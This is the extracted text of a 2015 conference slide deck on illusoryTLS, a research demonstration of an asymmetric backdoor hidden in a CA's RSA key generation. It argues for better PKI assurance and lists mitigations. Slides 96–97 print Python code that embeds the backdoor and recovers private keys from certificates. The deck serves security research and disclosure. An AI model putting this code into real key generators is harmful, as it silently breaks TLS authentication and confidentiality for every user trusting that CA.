illusoryTLS: Nobody But Us Impersonate, Tamper, Exploit

A
...
Nobody But Us Impersonate, Tamper, and Exploit
..
Alfonso De Gregorio
.
Founder, BeeWise
..
ZeroNights 2015, Moscow, November 25th-26th, 2015
..
....
Web PKI is Fragile
.
1/103
WebPKIisFragile
..
..
..
..
...
Discuss
.
Web PKI is Fragile
.
6/103
/me @secYOUre
#illusoryTLS
#ZeroNights
...
First times are...
.
Web PKI is Fragile
.
7/103
..
....
Web PKI is Fragile
.
8/103
If only we could notice them
...
Web PKI is Fragile
.
Web PKI is Fragile
.
9/103
...
Web PKI is Fragile
...
PKI Dramas
.
Web PKI is Fragile
.
10/103
. China Internet Network Information Center (CNNIC), 2015
. Lenovo, 2015
. National Informatics Centre of India, 2014
. ANSSI, 2013
. Trustwave, 2012
. Türktrust, 2011-2013
. DigiNotar, 2011
. Comodo, 2011
. Verisign, 2010
...
Unsuspecting Users
.
Web PKI is Fragile
.
11/103
..
...
Remaining oblivious
.
Web PKI is Fragile
.
12/103
..
...
Silent Failure
.
Web PKI is Fragile
.
13/103
..
..
...
/me
.
Web PKI is Fragile
.
15/103
At the intersection of so ware security and security so ware,
exploring, and trying to contain, the space of unanticipated state.
...
Secure Backdoor
.
Web PKI is Fragile
.
16/103
Almost safe
...
Agenda
.
Web PKI is Fragile
.
17/103
1. Web PKI is Fragile
The sorrow state of the infrastructure we daily entrust our business upon
2. illusoryTLS
Nobody But Us Impersonate, Tamper, and Exploit
3. The Impact
Or, why one rotten apple spoils the whole barrel
4. A Backdoor Embedding Algorithm
Elligator turned to evil
5. Conclusions
The misery of our times
...
Perspective
.
Web PKI is Fragile
.
18/103
. Timely topic o en debated as matter for a government to legislate on
...
Perspective
.
Web PKI is Fragile
.
18/103
. Timely topic o en debated as matter for a government to legislate on
. A space that some entities might have practically explored regardless of the
policy framework
...
Perspective
.
Web PKI is Fragile
.
18/103
. Timely topic o en debated as matter for a government to legislate on
. A space that some entities might have practically explored regardless of the
policy framework
. Would we be able to notice if our communications were being exploited?
...
Poll
.
Web PKI is Fragile
.
19/103
...
Poll
...
Poll
.
Web PKI is Fragile
.
20/103
How many of you think that
backdoors can be asymmetric?
...
Poll
.
Web PKI is Fragile
.
21/103
How many of you think that
backdoors can be planted in data?
...
Common View
.
Web PKI is Fragile
.
22/103
. Backdoors are symmetric
. Malicious logic in the target system code base
. Everyone with knowledge about the internals of the backdoor can exploit it
. Given enough skills and effort, code review can spot their presence
...
Yet
.
Web PKI is Fragile
.
23/103
. Backdoors can be asymmetric.
Their complete code does not enable anyone, except those with access to
the key-recovery system, to exploit the backdoor
...
Yet
.
Web PKI is Fragile
.
23/103
. Backdoors can be asymmetric.
Their complete code does not enable anyone, except those with access to
the key-recovery system, to exploit the backdoor
. Backdoors can be planted in data
....
Web PKI is Fragile
.
24/103
Backdoor is data, data is backdoor
....
Web PKI is Fragile
.
25/103
..
“
The illusion that your program is manipulating its data is powerful. But it is an
illusion: The data is controlling your program.
Taylor Hornby..
”
...
Scenario
.
Web PKI is Fragile
.
26/103
. The entire X.509 Web PKI security architecture falls apart, if a
single CA certificate with a secretly embedded backdoor enters
the certificate store of relying parties
...
Scenario
.
Web PKI is Fragile
.
26/103
. . The entire X.509 Web PKI security architecture falls apart, if a
single CA certificate with a secretly embedded backdoor enters
the certificate store of relying parties
Have we sufficient assurance that this did not happen already?
....
illusoryTLS
.
27/103
illusoryTLS
...
Underhanded Crypto Contest
.
illusoryTLS
.
28/103
. ..
..
“
The Underhanded Crypto Contest
is a competition to write or modify
crypto code that appears to be
secure, but actually does
something evil ..
”
...
illusoryTLS
.
illusoryTLS
.
29/103
. An instance of the Young and Yung elliptic curve asymmetric backdoor in
RSA key generation
...
Security Outcome
.
illusoryTLS
.
30/103
The backdoor completely perverts the security guarantees provided by the TLS
protocol, allowing the attacker to:
. Impersonate the endpoints (i.e., authentication failure)
...
Security Outcome
.
illusoryTLS
.
30/103
The backdoor completely perverts the security guarantees provided by the TLS
protocol, allowing the attacker to:
. Impersonate the endpoints (i.e., authentication failure)
. Tamper with their messages (i.e., integrity erosion)
...
Security Outcome
.
illusoryTLS
.
30/103
The backdoor completely perverts the security guarantees provided by the TLS
protocol, allowing the attacker to:
. Impersonate the endpoints (i.e., authentication failure)
. Tamper with their messages (i.e., integrity erosion)
. Actively eavesdrop their communications (i.e., confidentiality loss)
...
Threat Model
.
illusoryTLS
.
31/103
The backdoor designer can:
. “Insert vulnerabilities into commercial encryption systems, IT systems,
networks and endpoint communications devices used by targets.”
...
Threat Model
.
illusoryTLS
.
31/103
The backdoor designer can:
. “Insert vulnerabilities into commercial encryption systems, IT systems,
networks and endpoint communications devices used by targets.”
. “influence policies, standard and specifications for commercial public key
technologies.”
...
Threat Model
.
illusoryTLS
.
31/103
The backdoor designer can:
. “Insert vulnerabilities into commercial encryption systems, IT systems,
networks and endpoint communications devices used by targets.”
. “influence policies, standard and specifications for commercial public key
technologies.”
. Interfere with the supply-chain
...
Threat Model
.
illusoryTLS
.
31/103
The backdoor designer can:
. “Insert vulnerabilities into commercial encryption systems, IT systems,
networks and endpoint communications devices used by targets.”
. “influence policies, standard and specifications for commercial public key
technologies.”
. Interfere with the supply-chain
. Disregard everything about policy
...
Threat Model
.
illusoryTLS
.
31/103
The backdoor designer can:
. “Insert vulnerabilities into commercial encryption systems, IT systems,
networks and endpoint communications devices used by targets.”
. “influence policies, standard and specifications for commercial public key
technologies.”
. Interfere with the supply-chain
. Disregard everything about policy
. Or, she is simply in the position to build the security module used by the
Certification Authority for generating the key material
...
Three Modules
.
illusoryTLS
.
32/103
..
...
network-simple-tls
.
illusoryTLS
.
33/103
..
...
Echo service over TLS
.
illusoryTLS
.
34/103
..
...
Where is the backdoor?
.
illusoryTLS
.
35/103
If the client and server code is
contributed by an open-source project
and it is used as-is, where is the
backdoor?
...
Where is the backdoor?
.
illusoryTLS
.
36/103
..
...
A Covert Channel
.
illusoryTLS
.
37/103
. The upper order bits of the RSA modulus encode the asymmetric
encryption of a seed generated at random
...
A Covert Channel
.
illusoryTLS
.
37/103
. The upper order bits of the RSA modulus encode the asymmetric
encryption of a seed generated at random
. The same seed was used to generate one of the RSA primes of the CA
public-key modulus
...
A Covert Channel
.
illusoryTLS
.
37/103
. The upper order bits of the RSA modulus encode the asymmetric
encryption of a seed generated at random
. The same seed was used to generate one of the RSA primes of the CA
public-key modulus
. The RSA modulus is at the same time a RSA public-key and an ciphertext
that gives to the backdoor designer the ability to factor with ease the
modulus
...
Where the backdoor is not
.
illusoryTLS
.
38/103
No backdoor was slipped into the
cryptographic credentials issued to
the communicating endpoints
...
SETUP Attacks
.
illusoryTLS
.
39/103
..
. Notion introduced by Adam Young
and Moti Yung at Crypto ’96
. Young and Yung elliptic-curve
asymmetric backdoor in RSA key
generation
. Expands on ‘A Space Efficient
Backdoor in RSA and its
Applications’, Selected Areas in
Cryptography ’05
. A working implementation at
http://cryptovirology.com
...
NOBUS
.
illusoryTLS
.
40/103
..
. The exploitation requires access to
resources not embedded in the
backdoor itself
. e.g., elliptic-curve private key
. The vulnerability can be exploited
by the backdoor designer and by
whoever gains access to the
associated key-recovery system
....
illusoryTLS
.
41/103
How many of you believe that it is
possible to forbid an enemy
intelligence organization from gaining
access to a private key?
...
Indistinguishability
.
illusoryTLS
.
42/103
..
. Assuming ECDDH holds
. The backdoor key pairs appear to
all probabilistic polynomial time
algorithms like genuine RSA key
pairs
. Black-box access to the
key-generator does not allow
detection
...
Forward Secrecy
.
illusoryTLS
.
43/103
..
. If a reverse-engineer breaches the
key-generator, then the previously
stolen information remains
confidential
...
Reusability
.
illusoryTLS
.
44/103
..
. The backdoor can be used multiple
times and against multiple targets
....
Impact
.
45/103
Impact
...
A Subtle Attack
.
Impact
.
46/103
..
. Break TLS security guarantees at will
...
A Subtle Attack
.
Impact
.
46/103
..
. Break TLS security guarantees at will
. Impersonation (e.g., authentication
failure)
...
A Subtle Attack
.
Impact
.
46/103
..
. Break TLS security guarantees at will
. Impersonation (e.g., authentication
failure)
. Message tampering (e.g., integrity erosion)
...
A Subtle Attack
.
Impact
.
46/103
..
. Break TLS security guarantees at will
. Impersonation (e.g., authentication
failure)
. Message tampering (e.g., integrity erosion)
. Active eavesdropping of encrypted
communications (e.g., confidentiality loss)
...
A Subtle Attack
.
Impact
.
46/103
..
. Break TLS security guarantees at will
. Impersonation (e.g., authentication
failure)
. Message tampering (e.g., integrity erosion)
. Active eavesdropping of encrypted
communications (e.g., confidentiality loss)
. No need to have access to any private key
used by system actors
...
A Subtle Attack
.
Impact
.
46/103
..
. Break TLS security guarantees at will
. Impersonation (e.g., authentication
failure)
. Message tampering (e.g., integrity erosion)
. Active eavesdropping of encrypted
communications (e.g., confidentiality loss)
. No need to have access to any private key
used by system actors
. No need to tamper with the
communicating endpoints
...
A Subtle Attack
.
Impact
.
46/103
..
. Break TLS security guarantees at will
. Impersonation (e.g., authentication
failure)
. Message tampering (e.g., integrity erosion)
. Active eavesdropping of encrypted
communications (e.g., confidentiality loss)
. No need to have access to any private key
used by system actors
. No need to tamper with the
communicating endpoints
. Need to retain control over the
key-generation of the target RSA modulus
....
Impact
.
47/103
Is the malicious implementer a threat
mitigated by IT product security
certifications?
...
Fictional Security
.
Impact
.
48/103
...
A single CA certificate with a secretly embedded backdoor renders the entire TLS security fictional
...
One Rotten Apple...
.
Impact
.
49/103
...
One rotten apple...
...
... spoils the whole barrel
.
Impact
.
50/103
...
... spoils the whole barrel
...
Ethylene
.
Impact
.
51/103
..
....
Impact
.
52/103
Universal implicit cross-certification is
the ethylene of trust
...
C2H4
.
Impact
.
53/103
..
...
Cross Certification
.
Impact
.
54/103
..
...
Cross Certification
.
Impact
.
55/103
..
. Cross certification enables entities
in one public key infrastructure to
trust entities in another PKI
...
Cross Certification
.
Impact
.
55/103
..
. Cross certification enables entities
in one public key infrastructure to
trust entities in another PKI
. This mutual trust relationship
should be typically supported by a
cross-certification agreement
between the CAs in each PKI
...
Cross Certification
.
Impact
.
55/103
..
. Cross certification enables entities
in one public key infrastructure to
trust entities in another PKI
. This mutual trust relationship
should be typically supported by a
cross-certification agreement
between the CAs in each PKI
. The agreement establishes the
responsabilities and liability of
each party
...
Explicit Cross Certification
.
Impact
.
56/103
..
. Each CA is required to issue a
certificate to the other to establish
a relationship in both directions
...
Explicit Cross Certification
.
Impact
.
56/103
..
. Each CA is required to issue a
certificate to the other to establish
a relationship in both directions
. The path of trust is not hierarchical,
although the separate PKIs may be
certificate hierarchies
...
Explicit Cross Certification
.
Impact
.
56/103
..
. Each CA is required to issue a
certificate to the other to establish
a relationship in both directions
. The path of trust is not hierarchical,
although the separate PKIs may be
certificate hierarchies
. A er two CAs have established and
specified the terms of trust and
issued the certificates to each
other, entities within the separate
PKIs can interact subject to the
policies specified in the certificates
...
But this is just in theory...
...
In practice:
...
Implicit Cross Certification
.
Impact
.
59/103
..
. Most current PKI so ware employs a form
of implicit cross certification in which all
root CAs are equally trusted
...
Implicit Cross Certification
.
Impact
.
59/103
..
. Most current PKI so ware employs a form
of implicit cross certification in which all
root CAs are equally trusted
. Equivalent to unbounded cross
certification among all CAs
...
Implicit Cross Certification
.
Impact
.
59/103
..
. Most current PKI so ware employs a form
of implicit cross certification in which all
root CAs are equally trusted
. Equivalent to unbounded cross
certification among all CAs
. Any certificate can be trivially replaced by
a masquereder’s certificate from another
CA
...
Implicit Cross Certification
.
Impact
.
59/103
..
. Most current PKI so ware employs a form
of implicit cross certification in which all
root CAs are equally trusted
. Equivalent to unbounded cross
certification among all CAs
. Any certificate can be trivially replaced by
a masquereder’s certificate from another
CA
. The security of any certificate is reduced to
that of the least trustworthy CA, who can
issue bogus certificate to usurp the
legitimate one, at the same level of trust
...
CA Certificate in a MitM Proxy
.
Impact
.
60/103
..
...
Superfish Adware
.
Impact
.
61/103
..
...
PKI is Not Dead, Just Resting
.
Impact
.
62/103
..
...
Universal implicit cross-certification
...
Security
...
Ethylene
...
Rotting fruit
...
As weak as the weakest link
...
Multiple attackers attracted
..
..
..
...
Negating any meaningful security whatsoever
....
Impact
.
73/103
It is essential to have assurance about
the security of each implementation
of vulnerable key-generation
algorithm employed by trusted
credential issuers
...
Hundreds CAs
.
Impact
.
74/103
...
188 Trusted CA certificates installed
....
Impact
.
75/103
Have we sufficient assurance about
the hundreds CA certificates we daily
entrust our business upon?
...
Requirements
.
Impact
.
76/103
..
. Publicly trusted certificates to be
issued in compliance with
European Standard EN 319 411-3
...
Requirements
.
Impact
.
76/103
..
. Publicly trusted certificates to be
issued in compliance with
European Standard EN 319 411-3
. CA key generation to be carried out
within a device that meets the
requirements identified by some
approved PP
...
Requirements
.
Impact
.
76/103
..
. Publicly trusted certificates to be
issued in compliance with
European Standard EN 319 411-3
. CA key generation to be carried out
within a device that meets the
requirements identified by some
approved PP
. CEN Workshop Agreement 14167,
Part 2-3-4 are three of those PP
...
Requirements
.
Impact
.
76/103
..
. Publicly trusted certificates to be
issued in compliance with
European Standard EN 319 411-3
. CA key generation to be carried out
within a device that meets the
requirements identified by some
approved PP
. CEN Workshop Agreement 14167,
Part 2-3-4 are three of those PP
. EAL4 Augmented
...
Requirements
.
Impact
.
76/103
..
. Publicly trusted certificates to be
issued in compliance with
European Standard EN 319 411-3
. CA key generation to be carried out
within a device that meets the
requirements identified by some
approved PP
. CEN Workshop Agreement 14167,
Part 2-3-4 are three of those PP
. EAL4 Augmented
. Augmentation from adherence to
ADV_IMP.2, AVA_CCA.1, and
AVA_VLA.4
...
ADV_IMP.2, AVA_CCA.1, and AVA_VLA.4
.
Impact
.
77/103
..
. Focused on assessing the
vulnerabilities in the TOE
...
ADV_IMP.2, AVA_CCA.1, and AVA_VLA.4
.
Impact
.
77/103
..
. Focused on assessing the
vulnerabilities in the TOE
. Guaranteeing that the
implementation representation is
an accurate and complete
instantiation of the TSF
requirements
...
ADV_IMP.2, AVA_CCA.1, and AVA_VLA.4
.
Impact
.
77/103
..
. Focused on assessing the
vulnerabilities in the TOE
. Guaranteeing that the
implementation representation is
an accurate and complete
instantiation of the TSF
requirements
. Special emphasis on identifying
covert channels and estimating
their capacity
...
ADV_IMP.2, AVA_CCA.1, and AVA_VLA.4
.
Impact
.
77/103
..
. Focused on assessing the
vulnerabilities in the TOE
. Guaranteeing that the
implementation representation is
an accurate and complete
instantiation of the TSF
requirements
. Special emphasis on identifying
covert channels and estimating
their capacity
. SETUP attacks makes use of the
key-generation as a covert channel
for itself
...
Yet
.
Impact
.
78/103
..
. Developer is in charge for the vulnerability
assessment and documentation
...
Yet
.
Impact
.
78/103
..
. Developer is in charge for the vulnerability
assessment and documentation
. Conflicts with our threat model
...
Yet
.
Impact
.
78/103
..
. Developer is in charge for the vulnerability
assessment and documentation
. Conflicts with our threat model
. The evaluator is le with the
documentation and the implementation
representation to be assessed
...
Yet
.
Impact
.
78/103
..
. Developer is in charge for the vulnerability
assessment and documentation
. Conflicts with our threat model
. The evaluator is le with the
documentation and the implementation
representation to be assessed
. Can the presence of backdoor can be ruled
out at the required assurance level?
...
Yet
.
Impact
.
78/103
..
. Developer is in charge for the vulnerability
assessment and documentation
. Conflicts with our threat model
. The evaluator is le with the
documentation and the implementation
representation to be assessed
. Can the presence of backdoor can be ruled
out at the required assurance level?
. Formal methods required only at the two
highest levels (EAL6 and EAL7)
...
Yet
.
Impact
.
78/103
..
. Developer is in charge for the vulnerability
assessment and documentation
. Conflicts with our threat model
. The evaluator is le with the
documentation and the implementation
representation to be assessed
. Can the presence of backdoor can be ruled
out at the required assurance level?
. Formal methods required only at the two
highest levels (EAL6 and EAL7)
. Implementation representation may
render backdoor detection unlikely (e.g.,
HDL at design time, netlist at fabrication
time)
...
Key Takeaway
.
Impact
.
79/103
As long as the implementations of RSA — or, more generally,
algorithms vulnerable to this class of attacks — used by trusted
entities (e.g., CA) cannot be audited by relying parties (e.g., x.509
end-entities), any trust-anchor for the same trusted entities (e.g.,
root certificate) is to be regarded as a potential backdoor
...
Key Takeaway - Ctd
.
Impact
.
80/103
As long as the implementation of algorithms adopted by CAs and
vulnerable to this class of backdoors cannot be audited by relying
parties, the assurance provided by illusoryTLS (i.e., none
whatsoever) is not any different from the assurance provided by
systems relying upon TLS and RSA certificates for origin
authentication, confidentiality, and message integrity guarantees
...
Mitigations
.
Impact
.
81/103
. Key Pinning, RFC 7469, Public Key Pinning Extension for HTTP (HPKP), April
2015
. Certificate Transparency, RFC 6962, June 2013
. DANE, DNS-based Authentication of Named Entities, RFC 6698, August 2012
. Tack, Trust Assertions for Certificate Keys, dra -perrin-tls-tack-02.txt,
Expired
. Proper explicit cross-certification
....
A Backdoor Embedding Algorithm
.
82/103
ABackdoorEmbeddingAlgorithm
...
Subtleness
.
A Backdoor Embedding Algorithm
.
83/103
The subtleness of a backdoor planted in a cryptographic credential
resides in the absence of malicious logic in the system whose
security it erodes.
...
An attack variant
.
A Backdoor Embedding Algorithm
.
84/103
...
RyanC — https://gist.github.com/ryancdotorg/18235723e926be0afbdd
...
Idea
.
A Backdoor Embedding Algorithm
.
85/103
1. Embed a Curve25519 public-key into the key-generator
...
Idea
.
A Backdoor Embedding Algorithm
.
85/103
1. Embed a Curve25519 public-key into the key-generator
2. Generate an ephemeral Curve25519 key at random
...
Idea
.
A Backdoor Embedding Algorithm
.
85/103
1. Embed a Curve25519 public-key into the key-generator
2. Generate an ephemeral Curve25519 key at random
3. Compute a shared secret using Elliptic Curve Diffie-Hellman
...
Idea
.
A Backdoor Embedding Algorithm
.
85/103
1. Embed a Curve25519 public-key into the key-generator
2. Generate an ephemeral Curve25519 key at random
3. Compute a shared secret using Elliptic Curve Diffie-Hellman
4. Use the shared secret to seed at cryptographically secure pseudo-random
number generator (CSPRNG) based on AES run in CTR mode
...
Idea
.
A Backdoor Embedding Algorithm
.
85/103
1. Embed a Curve25519 public-key into the key-generator
2. Generate an ephemeral Curve25519 key at random
3. Compute a shared secret using Elliptic Curve Diffie-Hellman
4. Use the shared secret to seed at cryptographically secure pseudo-random
number generator (CSPRNG) based on AES run in CTR mode
5. Generate a normal RSA key using the seeded CSPRNG
...
Idea
.
A Backdoor Embedding Algorithm
.
85/103
1. Embed a Curve25519 public-key into the key-generator
2. Generate an ephemeral Curve25519 key at random
3. Compute a shared secret using Elliptic Curve Diffie-Hellman
4. Use the shared secret to seed at cryptographically secure pseudo-random
number generator (CSPRNG) based on AES run in CTR mode
5. Generate a normal RSA key using the seeded CSPRNG
6. Replace 32-bytes of the generated modulus with the ephemeral Curve25519
public-key
...
Idea
.
A Backdoor Embedding Algorithm
.
85/103
1. Embed a Curve25519 public-key into the key-generator
2. Generate an ephemeral Curve25519 key at random
3. Compute a shared secret using Elliptic Curve Diffie-Hellman
4. Use the shared secret to seed at cryptographically secure pseudo-random
number generator (CSPRNG) based on AES run in CTR mode
5. Generate a normal RSA key using the seeded CSPRNG
6. Replace 32-bytes of the generated modulus with the ephemeral Curve25519
public-key
7. Use the original prime factors to compute two new primes leading to a new
modulus embedding the ephemeral public-key
...
Idea
.
A Backdoor Embedding Algorithm
.
85/103
1. Embed a Curve25519 public-key into the key-generator
2. Generate an ephemeral Curve25519 key at random
3. Compute a shared secret using Elliptic Curve Diffie-Hellman
4. Use the shared secret to seed at cryptographically secure pseudo-random
number generator (CSPRNG) based on AES run in CTR mode
5. Generate a normal RSA key using the seeded CSPRNG
6. Replace 32-bytes of the generated modulus with the ephemeral Curve25519
public-key
7. Use the original prime factors to compute two new primes leading to a new
modulus embedding the ephemeral public-key
8. Output the RSA key with the secretly embedded backdoor
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
86/103
1. Extracts the ephemeral Curve25519 public-key from the target modulus
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
86/103
1. Extracts the ephemeral Curve25519 public-key from the target modulus
2. Computes the shared secret via ECDH and using the private-key associated
to the public-key embedded in the key generator
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
86/103
1. Extracts the ephemeral Curve25519 public-key from the target modulus
2. Computes the shared secret via ECDH and using the private-key associated
to the public-key embedded in the key generator
3. Uses the shared secret to seed the CSPRNG based on AES run in CTR mode
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
86/103
1. Extracts the ephemeral Curve25519 public-key from the target modulus
2. Computes the shared secret via ECDH and using the private-key associated
to the public-key embedded in the key generator
3. Uses the shared secret to seed the CSPRNG based on AES run in CTR mode
4. Generates a normal RSA key using the seeded CSPRNG
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
86/103
1. Extracts the ephemeral Curve25519 public-key from the target modulus
2. Computes the shared secret via ECDH and using the private-key associated
to the public-key embedded in the key generator
3. Uses the shared secret to seed the CSPRNG based on AES run in CTR mode
4. Generates a normal RSA key using the seeded CSPRNG
5. Replaces 32-bytes of the generated modulus with the ephemeral
Curve25519 public-key
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
86/103
1. Extracts the ephemeral Curve25519 public-key from the target modulus
2. Computes the shared secret via ECDH and using the private-key associated
to the public-key embedded in the key generator
3. Uses the shared secret to seed the CSPRNG based on AES run in CTR mode
4. Generates a normal RSA key using the seeded CSPRNG
5. Replaces 32-bytes of the generated modulus with the ephemeral
Curve25519 public-key
6. Uses the original prime factors to compute two new primes leading to the
target modulus embedding the ephmeral public-key
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
86/103
1. Extracts the ephemeral Curve25519 public-key from the target modulus
2. Computes the shared secret via ECDH and using the private-key associated
to the public-key embedded in the key generator
3. Uses the shared secret to seed the CSPRNG based on AES run in CTR mode
4. Generates a normal RSA key using the seeded CSPRNG
5. Replaces 32-bytes of the generated modulus with the ephemeral
Curve25519 public-key
6. Uses the original prime factors to compute two new primes leading to the
target modulus embedding the ephmeral public-key
7. Output the recovered RSA private key
...
Broken
.
A Backdoor Embedding Algorithm
.
87/103
..
. Although the idea is nice
. The key pairs generated using this
algorithm fall short in terms of
indistiguishability
. It is easy to tell backdoored
certificates apart from genuine RSA
certificate using only black-box
access
....
A Backdoor Embedding Algorithm
.
88/103
Does anybody see why this is the case?
...
Distinguishing Attack
.
A Backdoor Embedding Algorithm
.
89/103
. A public-key embedded into an RSA modulus
...
Distinguishing Attack
.
A Backdoor Embedding Algorithm
.
89/103
. A public-key embedded into an RSA modulus
. Elliptic curve public-keys are points on the curve
...
Distinguishing Attack
.
A Backdoor Embedding Algorithm
.
89/103
. A public-key embedded into an RSA modulus
. Elliptic curve public-keys are points on the curve
. And elliptic curve points are easily distinguished from uniform random
strings
...
Distinguishing Attack
.
A Backdoor Embedding Algorithm
.
89/103
. A public-key embedded into an RSA modulus
. Elliptic curve public-keys are points on the curve
. And elliptic curve points are easily distinguished from uniform random
strings
. A security evaluator could check if the coordinates encoded using the
candidate 32-byte substrings of the modulus satisfy the elliptic curve
equation
...
Repairing the Backdoor
.
A Backdoor Embedding Algorithm
.
90/103
If we could make the elliptic curve
points indistinguishable from random
strings, then the backdoor
indistinguishability would be retained
...
Elligator
.
A Backdoor Embedding Algorithm
.
91/103
..
. Censorship sucks!
. Daniel J. Bernstein, Anna Krasnova,
Mike Hamburg, Tanja Lange
. an encoding for points on a single
curve as strings indistiguishable
from uniform random strings
. http://elligator.cr.yp.to
...
Inherently Dual Use
.
A Backdoor Embedding Algorithm
.
92/103
...
All cyber security technology is inherently dual use
...
Undetectability for Good or Ill
.
A Backdoor Embedding Algorithm
.
93/103
..
. Just like any and all cyber security
tools
. Undetectability of curve points can
be used for good or ill
. For censorship-circumvention or
surveillance
...
Between Offense and Defense
.
A Backdoor Embedding Algorithm
.
94/103
I believe we can positively contribute
to the discussion and practice of
information security by walking the
fine line between offense and defense
...
Code
.
A Backdoor Embedding Algorithm
.
95/103
. Website — http://illusorytls.com
. illusoryTLS — https://github.com/secYOUre/illusoryTLS
. pyelligator — https://github.com/secYOUre/pyelligator
. rsaelligatorbd — https://github.com/secYOUre/rsaelligatorbd
...
Elligator backdoor embedding
.
A Backdoor Embedding Algorithm
.
96/103
. Embed a Curve25519 public-key into the key-generator
..MASTER_PUB_HEX = ’525e422e42c9c662362a7326c3c5c785ac7ef52e86782c4ac3c06887583e7a6f’
master_pub = unhexlify(MASTER_PUB_HEX)
...
Elligator backdoor embedding
.
A Backdoor Embedding Algorithm
.
96/103
. Generate an ephemeral Curve25519 key at random and the associated
uniform representative string
..
while True:
private = urandom(32)
(v, pub, rep) = elligator.scalarbasemult(private)
if v:
break
...
Elligator backdoor embedding
.
A Backdoor Embedding Algorithm
.
96/103
. Compute a shared secret using ECDH
. Use the shared secret to seed a CSPRNG based on AES run in CTR mode
..
# combine the ECDH keys to generate the seed
seed = nacl.crypto_box_beforenm(master_pub, private)
prng = AESPRNG(seed)
...
Elligator backdoor embedding
.
A Backdoor Embedding Algorithm
.
96/103
. Generate a normal RSA key using the seeded CSPRNG
..
# deterministic key generation from seed
rsa = build_key(embed=rep, pos=80, randfunc=prng.randbytes)
...
def build_key(bits=2048, e=65537, embed=’’, pos=1, randfunc=None):
# generate base key
rsa = RSA.generate(bits, randfunc)
...
Elligator backdoor embedding
.
A Backdoor Embedding Algorithm
.
96/103
. Replace 32-bytes of the generated modulus with the representative string
associated to the ephemeral Curve25519 public-key
..
# extract modulus as a string
n_str = unhexlify(str(hex(rsa.n))[2:-1])
# embed data into the modulus
n_hex = hexlify(replace_at(n_str, embed, pos))
...
# overwrite some bytes in orig at a specificed offset
def replace_at(orig, replace, offset):
return orig[0:offset] + replace + orig[offset+len(replace):]
...
Elligator backdoor embedding
.
A Backdoor Embedding Algorithm
.
96/103
. Use the original prime factors to compute to new primes leading to a new
modulus embedding the uniform representative string
..
n = gmpy.mpz(n_hex, 16)
p = rsa.p
# compute a starting point to look for a new q value
pre_q = n / p
# use the next prime as the new q value
q = pre_q.next_prime()
n = p * q
phi = (p-1) * (q-1)
# compute new private exponent
d = gmpy.invert(e, phi)
# make sure that p is smaller than q
if p > q:
(p, q) = (q, p)
...
Elligator backdoor embedding
.
A Backdoor Embedding Algorithm
.
96/103
. Output the backdoored RSA key
..return RSA.construct((long(n), long(e), long(d), long(p), long(q)))
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
97/103
. Extracts the representative string from the target modulus
..
#Load an x.509 certificate from a file
x509 = X509.load_cert(sys.argv[2])
# Pull the modulus out of the certificate
orig_modulus = unhexlify(x509.get_pubkey().get_modulus())
(seed, rep) = recover_seed(key=sys.argv[1], modulus=orig_modulus, pos=80)
...
def recover_seed(key=’’, modulus=None, pos=1):
...
rep = modulus[pos:pos+32]
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
97/103
. Maps the representative string to the candidate ephemeral Curve25519
public-key
..pub = elligator.representativetopublic(rep)
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
97/103
. Computes the shared secret via ECDH and using the private-key associated
to the public-key embedded in the key-generator
. Uses the shared secret to seed the CSPRNG based on AES run in CTR mode
..
def recover_seed(key=’’, modulus=None, pos=1):
# recreate the master private key from the passphrase
master = sha256(key).digest()
...
# compute seed with master private and ephemeral public key
return (nacl.crypto_box_beforenm(pub, master), rep)
...
(seed, rep) = recover_seed(key=sys.argv[1], modulus=orig_modulus, pos=80)
prng = AESPRNG(seed)
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
97/103
. Generates a normal RSA key using the seeded CSPRNG
..
# deterministic key generation from seed
rsa = build_key(embed=rep, pos=80, randfunc=prng.randbytes)
...
def build_key(bits=2048, e=65537, embed=’’, pos=1, randfunc=None):
# generate base key
rsa = RSA.generate(bits, randfunc)
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
97/103
. Replaces 32-bytes of the generated modulus with the representative string
found in the target modulus
..
# extract modulus as a string
n_str = unhexlify(str(hex(rsa.n))[2:-1])
# embed data into the modulus
n_hex = hexlify(replace_at(n_str, embed, pos))
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
97/103
. Uses the original prime factors to compute two new primes leading to the
target modulus embedding the uniform representative string
..
n = gmpy.mpz(n_hex, 16)
p = rsa.p
# compute a starting point to look for a new q value
pre_q = n / p
# use the next prime as the new q value
q = pre_q.next_prime()
n = p * q
phi = (p-1) * (q-1)
# compute new private exponent
d = gmpy.invert(e, phi)
# make sure that p is smaller than q
if p > q:
(p, q) = (q, p)
...
Key Recovery
.
A Backdoor Embedding Algorithm
.
97/103
. Output the recovered RSA key
..return RSA.construct((long(n), long(e), long(d), long(p), long(q)))
...
print rsa.exportKey()
....
Conclusions
.
98/103
Conclusions
..
..
“
Though I am o en in the depths of misery, there is still calmness, pure harmony
and music inside me.
Vincent van Gogh..
”
..
“
Though we are o en in the depths of insecurity, there is still calmness, pure
harmony and music inside us. ..
”
..
THANK YOU
Q ?
....
Backup
.
104/103
Backup
...
Normal RSA Key Generation — Young and Yung
.
Backup
.
105/103
1. Let e be the public RSA exponent (e.g., 216
+ 1)
2. Choose a large number p randomly (e.g., 1024 bits long)
3. If p is composite or gcd(e, p − 1) ̸= 1 then goto to step 1
4. Choose a large number q randomly (e.g., 1024 bits long)
5. If q is composite or gcd(e, p − 1) ̸= 1 then goto to step 3
6. Output the public-key (N = pq, e) and the private-key p
7. The private exponent d is found by solving for (d, k) in ed + kϕ(n) = 1 using
the extended Euclidean algorithm
...
RSA Encryption/Decryption — Young and Yung
.
Backup
.
106/103
. N = p ∗ q, where p and q are large primes known to the key owner
. Everyone knows N and e
. Let d be a privete key exponent where ed = 1mod(p − 1)(q − 1)
. To encrypt m ∈ Z∗
n (a er padding) compute: c = me
modN
. To decrypt the ciphertext c compute: m = cd
modN
. As far as we know: Only with known factorization given N and e, one can
find d
...
Elliptic Curve Decision Diffie-Hellman Problem
.
Backup
.
107/103
. Let C an elliptic-curve equation over the finite field Fq with prime order n
